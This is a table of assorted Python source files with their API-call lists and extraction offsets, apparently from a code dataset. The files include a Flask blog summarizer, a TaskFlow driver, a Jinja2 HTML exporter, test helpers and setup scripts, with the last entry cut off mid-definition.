| code (string, lengths 22-1.05M) | apis (list, lengths 1-3.31k) | extract_api (string, lengths 75-3.25M) |
| --- | --- | --- |
from .client import ScreenshotClient
import schedule
import click
from .schedule import run_screenshot_every
@click.command()
@click.option("--xpath", type=click.STRING, required=True, help="The XPATH of the element to be screenshot.")
@click.option("--output-file", type=click.STRING, required=True, help="The path of the output screenshot.")
@click.option("--url", type=click.STRING, required=True, help="The URL of the page you want to shoot.")
@click.option("--driver-dir", type=click.STRING, required=False, default="Directory where the driver binary is located (or is to be downloaded).")
@click.option("--every", type=click.STRING, required=False, help="Period of time between updates (in minutes or hours")
def main(**kwargs):
run_screenshot_every(
kwargs.get("every"),
kwargs.get("url"),
xpath=kwargs.get("xpath"),
driver_dir=kwargs.get("driver_dir")
)
if __name__ == "__main__":
main()
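# Example invocation (hypothetical entry-point name and period format; see
# run_screenshot_every for the exact syntax accepted by --every):
#   python -m screenshot_cli --url https://example.com --xpath "//div[@id='chart']" \
#       --output-file shot.png --every "30 minutes"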
|
[
"click.option",
"click.command"
] |
[((113, 128), 'click.command', 'click.command', ([], {}), '()\n', (126, 128), False, 'import click\n'), ((130, 243), 'click.option', 'click.option', (['"""--xpath"""'], {'type': 'click.STRING', 'required': '(True)', 'help': '"""The XPATH of the element to be screenshot."""'}), "('--xpath', type=click.STRING, required=True, help=\n 'The XPATH of the element to be screenshot.')\n", (142, 243), False, 'import click\n'), ((240, 351), 'click.option', 'click.option', (['"""--output-file"""'], {'type': 'click.STRING', 'required': '(True)', 'help': '"""The path of the output screenshot."""'}), "('--output-file', type=click.STRING, required=True, help=\n 'The path of the output screenshot.')\n", (252, 351), False, 'import click\n'), ((348, 455), 'click.option', 'click.option', (['"""--url"""'], {'type': 'click.STRING', 'required': '(True)', 'help': '"""The URL of the page you want to shoot."""'}), "('--url', type=click.STRING, required=True, help=\n 'The URL of the page you want to shoot.')\n", (360, 455), False, 'import click\n'), ((452, 602), 'click.option', 'click.option', (['"""--driver-dir"""'], {'type': 'click.STRING', 'required': '(False)', 'default': '"""Directory where the driver binary is located (or is to be downloaded)."""'}), "('--driver-dir', type=click.STRING, required=False, default=\n 'Directory where the driver binary is located (or is to be downloaded).')\n", (464, 602), False, 'import click\n'), ((599, 722), 'click.option', 'click.option', (['"""--every"""'], {'type': 'click.STRING', 'required': '(False)', 'help': '"""Period of time between updates (in minutes or hours"""'}), "('--every', type=click.STRING, required=False, help=\n 'Period of time between updates (in minutes or hours')\n", (611, 722), False, 'import click\n')]
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2017-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Pytest helpers."""
from __future__ import absolute_import, print_function
import os
import shutil
import tempfile
def make_fake_template(content=""):
"""Create fake template for testing.
:param content: File content.
    :returns: The temporary directory.
"""
temp_dir = tempfile.mkdtemp()
invenio_theme_dir = os.path.join(temp_dir, 'invenio_theme')
os.mkdir(invenio_theme_dir)
    with open(os.path.join(invenio_theme_dir, 'fake.html'), 'w+') as fake_file:
        fake_file.write(content)
return temp_dir
|
[
"os.mkdir",
"tempfile.mkdtemp",
"os.path.join"
] |
[((532, 550), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (548, 550), False, 'import tempfile\n'), ((575, 614), 'os.path.join', 'os.path.join', (['temp_dir', '"""invenio_theme"""'], {}), "(temp_dir, 'invenio_theme')\n", (587, 614), False, 'import os\n'), ((619, 646), 'os.mkdir', 'os.mkdir', (['invenio_theme_dir'], {}), '(invenio_theme_dir)\n', (627, 646), False, 'import os\n'), ((668, 712), 'os.path.join', 'os.path.join', (['invenio_theme_dir', '"""fake.html"""'], {}), "(invenio_theme_dir, 'fake.html')\n", (680, 712), False, 'import os\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import devspace
from devspace.commands import DevSpaceCommand
from devspace.exceptions import UsageError
from devspace.utils.misc import walk_modules
from devspace.servers import DevSpaceServer
import inspect
def _get_server_from_module(module_name, server_name, project_setting):
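    """Walk module_name and instantiate the DevSpaceServer subclass whose type matches server_name."""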
for module in walk_modules(module_name):
for obj in vars(module).values():
if inspect.isclass(obj) and \
issubclass(obj, DevSpaceServer) and \
obj.__module__ == module.__name__ and \
not obj == DevSpaceServer and \
server_name == obj.type:
return obj(project_setting)
class Command(DevSpaceCommand):
requires_project = True
def syntax(self):
return "[Options]"
def short_desc(self):
return "Render servers"
def add_options(self, parser):
DevSpaceCommand.add_options(self, parser)
parser.add_option("--all", dest="render_all", action="store_true",
help="Render all servers")
parser.add_option("--server", dest="server_name",
help="Render server by its name")
parser.add_option("--host", dest="host", action="store_true",
help="Render project file host ip")
def run(self, args, opts):
if len(args) > 0:
raise UsageError()
if opts.render_all:
print("render all server")
return
if opts.host:
return
print("render_server")
# print(self.settings.attributes)
server_name = opts.server_name
servers = self.settings.get("servers")
if not servers or server_name not in servers.keys():
print("No servers found please check your project configuration file")
self.exitcode = 1
return
server = _get_server_from_module('devspace.servers', server_name, self.settings)
server.render()
server.update_docker_compose()
@property
def templates_dir(self):
return self.settings['TEMPLATES_DIR'] or \
os.path.join(devspace.__path__[0], 'templates')
|
[
"devspace.utils.misc.walk_modules",
"inspect.isclass",
"devspace.exceptions.UsageError",
"devspace.commands.DevSpaceCommand.add_options",
"os.path.join"
] |
[((359, 384), 'devspace.utils.misc.walk_modules', 'walk_modules', (['module_name'], {}), '(module_name)\n', (371, 384), False, 'from devspace.utils.misc import walk_modules\n'), ((945, 986), 'devspace.commands.DevSpaceCommand.add_options', 'DevSpaceCommand.add_options', (['self', 'parser'], {}), '(self, parser)\n', (972, 986), False, 'from devspace.commands import DevSpaceCommand\n'), ((1441, 1453), 'devspace.exceptions.UsageError', 'UsageError', ([], {}), '()\n', (1451, 1453), False, 'from devspace.exceptions import UsageError\n'), ((2199, 2246), 'os.path.join', 'os.path.join', (['devspace.__path__[0]', '"""templates"""'], {}), "(devspace.__path__[0], 'templates')\n", (2211, 2246), False, 'import os\n'), ((443, 463), 'inspect.isclass', 'inspect.isclass', (['obj'], {}), '(obj)\n', (458, 463), False, 'import inspect\n')]
|
import os
import json
from pathlib import Path
from jinja2 import Environment, FileSystemLoader
from aids.app.settings import BASE_DIR
class toHtml:
def __init__(self):
self.env = Environment(loader=FileSystemLoader(BASE_DIR / 'templates'))
        self.out_path = Path.cwd()
self.scen_out_file = 'scenario.json'
self.story_out_file = 'story.json'
def new_dir(self, folder):
if folder:
try:
os.mkdir(self.out_path / folder)
except FileExistsError:
pass
with open(BASE_DIR / 'static/style.css', 'r') as file:
style = file.read()
with open(self.out_path / f'{folder}/style.css', 'w') as file:
file.write(style)
def story_to_html(self, infile: str=None):
infile = infile or self.out_path / self.story_out_file
self.new_dir('stories')
with open(infile) as file:
stories = json.load(file)
story_templ = self.env.get_template('story.html')
story_number = {}
for story in reversed(stories):
if story['title']:
story['title'] = story['title'].replace('/', '-')
try:
story_number[story["title"]]
except KeyError:
# new story
                story_number[story["title"]] = ""
if not os.path.exists(
self.out_path /
f'stories/{story["title"]}{story_number[story["title"]]}.html'
):
htmlfile = open(self.out_path / f'stories/{story["title"]}.html', 'w')
else:
# story from same scenario
if story_number[story["title"]]:
story_number[story["title"]] += 1
htmlfile = open(
self.out_path /
f'stories/{story["title"]}{story_number[story["title"]]}.html',
'w'
)
else:
story_number[story["title"]] = 2
htmlfile = open(
self.out_path /
f'stories/{story["title"]}{story_number[story["title"]]}.html',
'w'
)
htmlfile.write(
story_templ.render({
'story': story,
'story_number': story_number
})
)
htmlfile.close()
index = self.env.get_template('index.html')
with open(self.out_path / 'story_index.html', 'w') as outfile:
outfile.write(
index.render(
{'objects': stories, 'content_type': 'stories'
})
)
print('Stories successfully formatted')
def scenario_to_html(self, infile: str=None):
infile = infile or self.out_path / self.scen_out_file
self.new_dir('scenarios')
with open(infile) as file:
scenarios = json.load(file)
subscen_paths = {}
parent_scen = []
for scenario in reversed(scenarios):
scenario['title'] = scenario['title'].replace('/', '-')
if 'isOption' not in scenario or not scenario['isOption']:
# base scenario, initializing the path
scenario['path'] = 'scenarios/'
with open(
self.out_path /
f'{scenario["path"] + scenario["title"]}.html',
'w'
) as file:
scen_templ = self.env.get_template('scenario.html')
file.write(
scen_templ.render({
'scenario': scenario,
'content_type': 'scenario'
})
)
parent_scen.append(scenario)
else:
scenario['path'] = subscen_paths[scenario['title']]
with open(
self.out_path /
f'{scenario["path"]}/{scenario["title"]}.html',
'w'
) as file:
scen_templ = self.env.get_template('scenario.html')
file.write(
scen_templ.render({
'scenario': scenario,
'content_type': 'scenario'
})
)
if "options" in scenario and any(scenario['options']):
for subscen in scenario['options']:
if subscen and "title" in subscen:
subscen['title'] = subscen['title'].replace('/', '-')
subscen['path'] = f'{scenario["path"]}{scenario["title"]}'
subscen_paths[subscen['title']] = subscen['path'] + '/'
self.new_dir(subscen['path'])
index = self.env.get_template('index.html')
with open(self.out_path / 'scen_index.html', 'w') as outfile:
outfile.write(
index.render(
{'objects': parent_scen, 'content_type': 'scenarios'
})
)
print('Scenarios successfully formatted')
|
[
"os.mkdir",
"json.load",
"os.path.exists",
"jinja2.FileSystemLoader",
"pathlib.Path"
] |
[((985, 1000), 'json.load', 'json.load', (['file'], {}), '(file)\n', (994, 1000), False, 'import json\n'), ((3110, 3125), 'json.load', 'json.load', (['file'], {}), '(file)\n', (3119, 3125), False, 'import json\n'), ((224, 264), 'jinja2.FileSystemLoader', 'FileSystemLoader', (["(BASE_DIR / 'templates')"], {}), "(BASE_DIR / 'templates')\n", (240, 264), False, 'from jinja2 import Environment, FileSystemLoader\n'), ((293, 299), 'pathlib.Path', 'Path', ([], {}), '()\n', (297, 299), False, 'from pathlib import Path\n'), ((485, 517), 'os.mkdir', 'os.mkdir', (['(self.out_path / folder)'], {}), '(self.out_path / folder)\n', (493, 517), False, 'import os\n'), ((1425, 1523), 'os.path.exists', 'os.path.exists', (['(self.out_path / f"stories/{story[\'title\']}{story_number[story[\'title\']]}.html"\n )'], {}), '(self.out_path /\n f"stories/{story[\'title\']}{story_number[story[\'title\']]}.html")\n', (1439, 1523), False, 'import os\n')]
|
import os
def get_full_path(path, file=__file__):
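    """Resolve path relative to the directory containing file (this module by default)."""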
dir_path = os.path.dirname(file)
return os.path.join(dir_path, path)
|
[
"os.path.dirname",
"os.path.join"
] |
[((67, 88), 'os.path.dirname', 'os.path.dirname', (['file'], {}), '(file)\n', (82, 88), False, 'import os\n'), ((100, 128), 'os.path.join', 'os.path.join', (['dir_path', 'path'], {}), '(dir_path, path)\n', (112, 128), False, 'import os\n')]
|
from aiokraken.model.tests.strats.st_asset import AssetStrategy
from aiokraken.rest.assets import Assets
import hypothesis.strategies as st
@st.composite
def st_assets(draw):
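    """Hypothesis strategy: draw up to 5 assets with unique restnames and wrap them in an Assets collection."""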
apl = draw(st.lists(elements=AssetStrategy(), max_size=5, unique_by=lambda x: x.restname))
return Assets(assets_as_dict={ap.restname: ap for ap in apl})
if __name__ == '__main__':
for n in range(1, 10):
print(repr(st_assets().example()))
|
[
"aiokraken.rest.assets.Assets",
"aiokraken.model.tests.strats.st_asset.AssetStrategy"
] |
[((285, 339), 'aiokraken.rest.assets.Assets', 'Assets', ([], {'assets_as_dict': '{ap.restname: ap for ap in apl}'}), '(assets_as_dict={ap.restname: ap for ap in apl})\n', (291, 339), False, 'from aiokraken.rest.assets import Assets\n'), ((212, 227), 'aiokraken.model.tests.strats.st_asset.AssetStrategy', 'AssetStrategy', ([], {}), '()\n', (225, 227), False, 'from aiokraken.model.tests.strats.st_asset import AssetStrategy\n')]
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
HTTP utils
"""
import requests
from ..version import version
DEFAULT_USER_AGENT = 'python-pyvo/{}'.format(version)
def use_session(session):
"""
Return the session passed in, or create a default
session to use for this network request.
"""
if session:
return session
else:
return create_session()
def create_session():
"""
Create a new empty requests session with a pyvo
user agent.
"""
session = requests.Session()
session.headers['User-Agent'] = DEFAULT_USER_AGENT
return session
|
[
"requests.Session"
] |
[((530, 548), 'requests.Session', 'requests.Session', ([], {}), '()\n', (546, 548), False, 'import requests\n')]
|
# Copyright (c) 2015 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_config import cfg
from taskflow.jobs import backends as job_backends
from taskflow.persistence import backends as persistence_backends
from canary.tasks import base
from canary.openstack.common import log
LOG = log.getLogger(__name__)
TASKFLOW_OPTIONS = [
cfg.StrOpt('jobboard_backend_type', default='zookeeper',
help='Default jobboard backend type'),
cfg.StrOpt('persistent_backend_type', default='zookeeper',
help='Default jobboard persistent backend type'),
cfg.ListOpt('jobboard_backend_host', default=['localhost'],
help='Default jobboard backend server host'),
cfg.IntOpt('jobboard_backend_port', default=2181,
               help='Default jobboard backend server port (e.g. amqp)'),
cfg.ListOpt('persistent_backend_host', default=['localhost'],
help='Default persistent backend server host'),
cfg.IntOpt('persistent_backend_port', default=2181,
               help='Default persistent backend server port (e.g. amqp)'),
cfg.StrOpt('canary_worker_path',
default='/taskflow/jobs/canary_jobs',
help='Default Zookeeper path for canary jobs'),
cfg.StrOpt('canary_worker_jobboard',
default='canary_jobs',
help='Default jobboard name associated with canary worker jobs'),
]
TASKFLOW_GROUP = 'tasks:taskflow'
class TaskFlowDistributedTaskDriver(base.Driver):
"""TaskFlow distributed task Driver."""
def __init__(self, conf):
super(TaskFlowDistributedTaskDriver, self).__init__(conf)
conf.register_opts(TASKFLOW_OPTIONS, group=TASKFLOW_GROUP)
self.distributed_task_conf = conf[TASKFLOW_GROUP]
job_backends_hosts = ','.join(['%s:%s' % (
host, self.distributed_task_conf.jobboard_backend_port)
for host in
self.distributed_task_conf.jobboard_backend_host])
self.jobboard_backend_conf_worker = {
# This topic could become more complicated
"board": self.distributed_task_conf.jobboard_backend_type,
"hosts": job_backends_hosts,
"path": self.distributed_task_conf.canary_worker_path,
}
        persistence_backends_hosts = ','.join(['%s:%s' % (
            host, self.distributed_task_conf.persistent_backend_port)
            for host in
            self.distributed_task_conf.persistent_backend_host])
self.persistence_backend_conf = {
# This topic could become more complicated
"connection": self.distributed_task_conf.persistent_backend_type,
"hosts": persistence_backends_hosts,
}
def is_alive(self):
"""Health check for TaskFlow worker."""
return True
def persistence(self):
return persistence_backends.backend(
self.persistence_backend_conf.copy())
def job_board(self, conf, persistence, **kwargs):
return job_backends.backend(
self.distributed_task_conf.canary_worker_jobboard,
conf.copy(), persistence=persistence)
@property
    def vendor_name(self):
        """Storage backend name.

        :returns: 'TaskFlow'
        """
return 'TaskFlow'
|
[
"oslo_config.cfg.StrOpt",
"oslo_config.cfg.IntOpt",
"canary.openstack.common.log.getLogger",
"oslo_config.cfg.ListOpt"
] |
[((808, 831), 'canary.openstack.common.log.getLogger', 'log.getLogger', (['__name__'], {}), '(__name__)\n', (821, 831), False, 'from canary.openstack.common import log\n'), ((858, 957), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (['"""jobboard_backend_type"""'], {'default': '"""zookeeper"""', 'help': '"""Default jobboard backend type"""'}), "('jobboard_backend_type', default='zookeeper', help=\n 'Default jobboard backend type')\n", (868, 957), False, 'from oslo_config import cfg\n'), ((973, 1085), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (['"""persistent_backend_type"""'], {'default': '"""zookeeper"""', 'help': '"""Default jobboard persistent backend type"""'}), "('persistent_backend_type', default='zookeeper', help=\n 'Default jobboard persistent backend type')\n", (983, 1085), False, 'from oslo_config import cfg\n'), ((1101, 1210), 'oslo_config.cfg.ListOpt', 'cfg.ListOpt', (['"""jobboard_backend_host"""'], {'default': "['localhost']", 'help': '"""Default jobboard backend server host"""'}), "('jobboard_backend_host', default=['localhost'], help=\n 'Default jobboard backend server host')\n", (1112, 1210), False, 'from oslo_config import cfg\n'), ((1227, 1338), 'oslo_config.cfg.IntOpt', 'cfg.IntOpt', (['"""jobboard_backend_port"""'], {'default': '(2181)', 'help': '"""Default jobboard backend server port (e.g: ampq)"""'}), "('jobboard_backend_port', default=2181, help=\n 'Default jobboard backend server port (e.g: ampq)')\n", (1237, 1338), False, 'from oslo_config import cfg\n'), ((1354, 1467), 'oslo_config.cfg.ListOpt', 'cfg.ListOpt', (['"""persistent_backend_host"""'], {'default': "['localhost']", 'help': '"""Default persistent backend server host"""'}), "('persistent_backend_host', default=['localhost'], help=\n 'Default persistent backend server host')\n", (1365, 1467), False, 'from oslo_config import cfg\n'), ((1484, 1599), 'oslo_config.cfg.IntOpt', 'cfg.IntOpt', (['"""persistent_backend_port"""'], {'default': '(2181)', 'help': '"""Default persistent backend server port (e.g: ampq)"""'}), "('persistent_backend_port', default=2181, help=\n 'Default persistent backend server port (e.g: ampq)')\n", (1494, 1599), False, 'from oslo_config import cfg\n'), ((1615, 1737), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (['"""canary_worker_path"""'], {'default': '"""/taskflow/jobs/canary_jobs"""', 'help': '"""Default Zookeeper path for canary jobs"""'}), "('canary_worker_path', default='/taskflow/jobs/canary_jobs', help\n ='Default Zookeeper path for canary jobs')\n", (1625, 1737), False, 'from oslo_config import cfg\n'), ((1768, 1897), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (['"""canary_worker_jobboard"""'], {'default': '"""canary_jobs"""', 'help': '"""Default jobboard name associated with canary worker jobs"""'}), "('canary_worker_jobboard', default='canary_jobs', help=\n 'Default jobboard name associated with canary worker jobs')\n", (1778, 1897), False, 'from oslo_config import cfg\n')]
|
from flask import Flask, render_template, flash, request
from flask_bootstrap import Bootstrap
from flask_wtf import FlaskForm
from wtforms import SubmitField
from wtforms.fields.html5 import URLField, IntegerField
from wtforms.validators import DataRequired, Optional
from wtforms.widgets import html5 as h5widgets
from utils import fetch, get_query_url
app = Flask(__name__)
# Flask-WTF requires an encryption key - the string can be anything
app.config['SECRET_KEY'] = '<KEY>'
# Flask-Bootstrap requires this line
Bootstrap(app)
DEFAULT_MAX_PAGE = 10
@app.route('/', methods=['GET', 'POST'])
def home():
header = "Summarize WordPress Blog"
form = NameForm()
site_url = request.args.get('url')
base_url = request.base_url
    if request.method == 'GET' and site_url is not None:
        number_of_pages = request.args.get('pages')
        if number_of_pages is not None:
            try:
                number_of_pages = int(number_of_pages)
            except ValueError:
                number_of_pages = 1
form.number_of_pages.data = number_of_pages
form.name.data = site_url
lines = fetch(site_url, number_of_pages)
query_url = get_query_url(base_url, site_url, number_of_pages)
return render_template('search.html', pairs=lines, the_title=header, form=form, query_url=query_url)
elif request.method == 'POST' and form.validate_on_submit():
site_url = form.name.data
number_of_pages = form.number_of_pages.data
if number_of_pages is None:
number_of_pages = DEFAULT_MAX_PAGE
lines = fetch(site_url, number_of_pages)
query_url = get_query_url(base_url, site_url, number_of_pages)
return render_template('search.html', pairs=lines, the_title=header, form=form, query_url=query_url)
return render_template('search.html', the_title=header, form=form)
class NameForm(FlaskForm):
name = URLField('Enter a url for wordpress blog',
validators=[DataRequired()], description="e.g. https://www.xyz.com/articles or https://www.xyz.com/blogs")
number_of_pages = IntegerField('Enter number of pages you want to see',
widget=h5widgets.NumberInput(
min=1, max=100),
validators=[Optional()])
submit = SubmitField('Submit')
if __name__ == '__main__':
app.run()
|
[
"utils.fetch",
"flask.request.args.get",
"wtforms.widgets.html5.NumberInput",
"flask.Flask",
"wtforms.SubmitField",
"wtforms.validators.Optional",
"flask.render_template",
"utils.get_query_url",
"flask_bootstrap.Bootstrap",
"wtforms.validators.DataRequired"
] |
[((362, 377), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (367, 377), False, 'from flask import Flask, render_template, flash, request\n'), ((519, 533), 'flask_bootstrap.Bootstrap', 'Bootstrap', (['app'], {}), '(app)\n', (528, 533), False, 'from flask_bootstrap import Bootstrap\n'), ((688, 711), 'flask.request.args.get', 'request.args.get', (['"""url"""'], {}), "('url')\n", (704, 711), False, 'from flask import Flask, render_template, flash, request\n'), ((1809, 1868), 'flask.render_template', 'render_template', (['"""search.html"""'], {'the_title': 'header', 'form': 'form'}), "('search.html', the_title=header, form=form)\n", (1824, 1868), False, 'from flask import Flask, render_template, flash, request\n'), ((2350, 2371), 'wtforms.SubmitField', 'SubmitField', (['"""Submit"""'], {}), "('Submit')\n", (2361, 2371), False, 'from wtforms import SubmitField\n'), ((824, 849), 'flask.request.args.get', 'request.args.get', (['"""pages"""'], {}), "('pages')\n", (840, 849), False, 'from flask import Flask, render_template, flash, request\n'), ((1120, 1152), 'utils.fetch', 'fetch', (['site_url', 'number_of_pages'], {}), '(site_url, number_of_pages)\n', (1125, 1152), False, 'from utils import fetch, get_query_url\n'), ((1173, 1223), 'utils.get_query_url', 'get_query_url', (['base_url', 'site_url', 'number_of_pages'], {}), '(base_url, site_url, number_of_pages)\n', (1186, 1223), False, 'from utils import fetch, get_query_url\n'), ((1239, 1336), 'flask.render_template', 'render_template', (['"""search.html"""'], {'pairs': 'lines', 'the_title': 'header', 'form': 'form', 'query_url': 'query_url'}), "('search.html', pairs=lines, the_title=header, form=form,\n query_url=query_url)\n", (1254, 1336), False, 'from flask import Flask, render_template, flash, request\n'), ((1584, 1616), 'utils.fetch', 'fetch', (['site_url', 'number_of_pages'], {}), '(site_url, number_of_pages)\n', (1589, 1616), False, 'from utils import fetch, get_query_url\n'), ((1637, 1687), 'utils.get_query_url', 'get_query_url', (['base_url', 'site_url', 'number_of_pages'], {}), '(base_url, site_url, number_of_pages)\n', (1650, 1687), False, 'from utils import fetch, get_query_url\n'), ((1703, 1800), 'flask.render_template', 'render_template', (['"""search.html"""'], {'pairs': 'lines', 'the_title': 'header', 'form': 'form', 'query_url': 'query_url'}), "('search.html', pairs=lines, the_title=header, form=form,\n query_url=query_url)\n", (1718, 1800), False, 'from flask import Flask, render_template, flash, request\n'), ((2197, 2234), 'wtforms.widgets.html5.NumberInput', 'h5widgets.NumberInput', ([], {'min': '(1)', 'max': '(100)'}), '(min=1, max=100)\n', (2218, 2234), True, 'from wtforms.widgets import html5 as h5widgets\n'), ((1984, 1998), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (1996, 1998), False, 'from wtforms.validators import DataRequired, Optional\n'), ((2323, 2333), 'wtforms.validators.Optional', 'Optional', ([], {}), '()\n', (2331, 2333), False, 'from wtforms.validators import DataRequired, Optional\n')]
|
import pytest
from inutils import chunkify
@pytest.mark.parametrize(
"iterable, expected",
(
([1], [[1]]),
([1, 2], [[1, 2]]),
([1, 2, 3], [[1, 2], [3]]),
([1, 2, 3, 4, 5], [[1, 2], [3, 4], [5]]),
(range(1, 7), [[1, 2], [3, 4], [5, 6]]),
),
)
def test_chunkify_size_2(iterable, expected):
assert list(chunkify(iterable, chunk_size=2)) == expected
@pytest.mark.parametrize(
"iterable, expected",
(
([1, 2], [[1, 2]]),
([1, 2, 3], [[1, 2, 3]]),
([1, 2, 3, 4, 5], [[1, 2, 3], [4, 5]]),
(range(1, 7), [[1, 2, 3], [4, 5, 6]]),
([1, 2, 3, 4, 5, 6, 7], [[1, 2, 3], [4, 5, 6], [7]]),
),
)
def test_chunkify_size_3(iterable, expected):
assert list(chunkify(iterable, chunk_size=3)) == expected
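# For reference, a minimal implementation consistent with the tests above
# (a sketch only; the actual inutils.chunkify may be implemented differently,
# so it is left commented out to avoid shadowing the import):
#
# from itertools import islice
#
# def chunkify(iterable, chunk_size):
#     it = iter(iterable)
#     while chunk := list(islice(it, chunk_size)):
#         yield chunk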
|
[
"inutils.chunkify"
] |
[((360, 392), 'inutils.chunkify', 'chunkify', (['iterable'], {'chunk_size': '(2)'}), '(iterable, chunk_size=2)\n', (368, 392), False, 'from inutils import chunkify\n'), ((756, 788), 'inutils.chunkify', 'chunkify', (['iterable'], {'chunk_size': '(3)'}), '(iterable, chunk_size=3)\n', (764, 788), False, 'from inutils import chunkify\n')]
|
"""pyspikelib: A set of tools for neuronal spiking data mining"""
import os
import re
import codecs
import setuptools
here = os.path.abspath(os.path.dirname(__file__))
with open('README.md', 'r') as fh:
LONG_DESCRIPTION = fh.read()
def read(*parts):
with codecs.open(os.path.join(here, *parts), 'r') as fp:
return fp.read()
def find_version(*file_paths):
version_file = read(*file_paths)
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError('Unable to find version string.')
DISTNAME = 'pyspikelib'
DESCRIPTION = 'pyspikelib: A set of tools for neuronal spiking data mining'
MAINTAINER = '<NAME>'
MAINTAINER_EMAIL = '<EMAIL>'
URL = 'https://github.com/vanyalzr/pyspikelib'
DOWNLOAD_URL = 'https://github.com/vanyalzr/pyspikelib'
VERSION = find_version(os.path.join(here, 'pyspikelib/version.py'))
LONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'
INSTALL_REQUIRES = [
'addict',
'pathos',
'quantities',
'neo',
'matplotlib',
'numpy',
'seaborn',
'tqdm',
'pandas',
'elephant',
'tsfresh',
'scikit_learn',
'psutil'
]
EXTRAS_REQUIRE = {'tests': ['pytest'], 'data': ['fastparquet']}
setuptools.setup(
name=DISTNAME,
version=VERSION,
author=MAINTAINER,
author_email=MAINTAINER_EMAIL,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,
url=URL,
download_url=DOWNLOAD_URL,
packages=setuptools.find_packages(exclude=['data', 'examples', 'experiments']),
classifiers=[
'Programming Language :: Python :: 3',
'Operating System :: OS Independent',
],
install_requires=INSTALL_REQUIRES,
extras_require=EXTRAS_REQUIRE,
)
|
[
"os.path.dirname",
"re.search",
"os.path.join",
"setuptools.find_packages"
] |
[((143, 168), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (158, 168), False, 'import os\n'), ((435, 508), 're.search', 're.search', (['"""^__version__ = [\'\\\\"]([^\'\\\\"]*)[\'\\\\"]"""', 'version_file', 're.M'], {}), '(\'^__version__ = [\\\'\\\\"]([^\\\'\\\\"]*)[\\\'\\\\"]\', version_file, re.M)\n', (444, 508), False, 'import re\n'), ((900, 943), 'os.path.join', 'os.path.join', (['here', '"""pyspikelib/version.py"""'], {}), "(here, 'pyspikelib/version.py')\n", (912, 943), False, 'import os\n'), ((1583, 1652), 'setuptools.find_packages', 'setuptools.find_packages', ([], {'exclude': "['data', 'examples', 'experiments']"}), "(exclude=['data', 'examples', 'experiments'])\n", (1607, 1652), False, 'import setuptools\n'), ((280, 306), 'os.path.join', 'os.path.join', (['here', '*parts'], {}), '(here, *parts)\n', (292, 306), False, 'import os\n')]
|
import logging
from datetime import timedelta
API = "api"
NAME = "afvalwijzer"
VERSION = "2021.05.01"
ISSUE_URL = "https://github.com/xirixiz/homeassistant-afvalwijzer/issues"
SENSOR_PROVIDER_TO_URL = {
"afvalwijzer_data_default": [
"https://api.{0}.nl/webservices/appsinput/?apikey=5ef443e778f41c4f75c69459eea6e6ae0c2d92de729aa0fc61653815fbd6a8ca&method=postcodecheck&postcode={1}&street=&huisnummer={2}&toevoeging={3}&app_name=afvalwijzer&platform=phone&afvaldata={4}&langs=nl&"
],
}
CONF_PROVIDER = "provider"
CONF_API_TOKEN = "<PASSWORD>_token"
# <KEY>
CONF_POSTAL_CODE = "postal_code"
CONF_STREET_NUMBER = "street_number"
CONF_SUFFIX = "suffix"
CONF_DATE_FORMAT = "date_format"
CONF_INCLUDE_DATE_TODAY = "include_date_today"
CONF_DEFAULT_LABEL = "default_label"
CONF_ID = "id"
CONF_EXCLUDE_LIST = "exclude_list"
SENSOR_PREFIX = "afvalwijzer "
SENSOR_ICON = "mdi:recycle"
ATTR_LAST_UPDATE = "last_update"
ATTR_IS_COLLECTION_DATE_TODAY = "is_collection_date_today"
ATTR_IS_COLLECTION_DATE_TOMORROW = "is_collection_date_tomorrow"
ATTR_IS_COLLECTION_DATE_DAY_AFTER_TOMORROW = "is_collection_date_day_after_tomorrow"
ATTR_DAYS_UNTIL_COLLECTION_DATE = "days_until_collection_date"
ATTR_YEAR_MONTH_DAY_DATE = "year_month_day_date"
_LOGGER = logging.getLogger(__name__)
MIN_TIME_BETWEEN_UPDATES = timedelta(hours=1)
PARALLEL_UPDATES = 1
SCAN_INTERVAL = timedelta(seconds=30)
DOMAIN = "afvalwijzer"
DOMAIN_DATA = "afvalwijzer_data"
STARTUP_MESSAGE = f"""
-------------------------------------------------------------------
Afvalwijzer
This is a custom integration!
If you have any issues with this you need to open an issue here:
https://github.com/xirixiz/homeassistant-afvalwijzer/issues
-------------------------------------------------------------------
"""
|
[
"datetime.timedelta",
"logging.getLogger"
] |
[((1262, 1289), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1279, 1289), False, 'import logging\n'), ((1318, 1336), 'datetime.timedelta', 'timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (1327, 1336), False, 'from datetime import timedelta\n'), ((1374, 1395), 'datetime.timedelta', 'timedelta', ([], {'seconds': '(30)'}), '(seconds=30)\n', (1383, 1395), False, 'from datetime import timedelta\n')]
|
import copy
import requests
class AuthController:
_REQ_HEADERS = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36",
"Connection": "keep-alive",
"Cache-Control": "max-age=0",
